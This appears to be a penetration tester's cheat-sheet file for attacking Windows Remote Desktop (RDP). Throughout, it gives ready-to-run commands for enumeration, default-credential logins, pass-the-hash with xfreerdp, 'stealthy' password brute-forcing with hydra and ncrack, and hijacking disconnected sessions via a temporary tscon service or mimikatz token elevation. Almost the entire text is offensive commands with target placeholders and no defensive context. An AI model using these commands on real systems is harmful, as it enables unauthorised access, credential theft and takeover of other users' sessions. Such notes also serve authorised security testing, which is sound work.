Target.Host.Service.RDP.txt

`` Scanning

    ~$ nmap --script rdp-enum-encryption,rdp-ntlm-info VAR_TARGET_HOST

`` Connection

    ~$ rdesktop -u guest -p guest VAR_TARGET_HOST -g 85%
    ~$ rdesktop -u VAR_USERNAME -p VAR_PASSWORD -g 85% -r disk:share=/root/ VAR_TARGET_HOST

`` PTH

    -- PTH available for Windows 2012 R2 and Windows 8.1
    ~$ xfreerdp /u:VAR_USERNAME /d:VAR_DOMAIN /pth:VAR_NT_HASH /v:VAR_TARGET_HOST

`` Password Bruteforcing

    ~$ hydra -V -t 1 -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD rdp://VAR_TARGET_HOST
    ~$ ncrack -vv --pairwise -U ../usernames.txt -P ../passwords.txt -f --stealthy-linear rdp://VAR_TARGET_HOST

`` Hijacking disconnected sessions

    `` Using service

        ~> query user
        -- grab session names or IDs
        ~> sc.exe create VAR_STRING binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1" type= own
        ~> sc.exe start VAR_STRING
        ~> sc.exe delete VAR_STRING

    `` Using mimikatz

        ~> mimikatz
        mimikatz # ts::sessions
        mimikatz # privilege::debug
        mimikatz # token::elevate
        mimikatz # ts::remote /id:2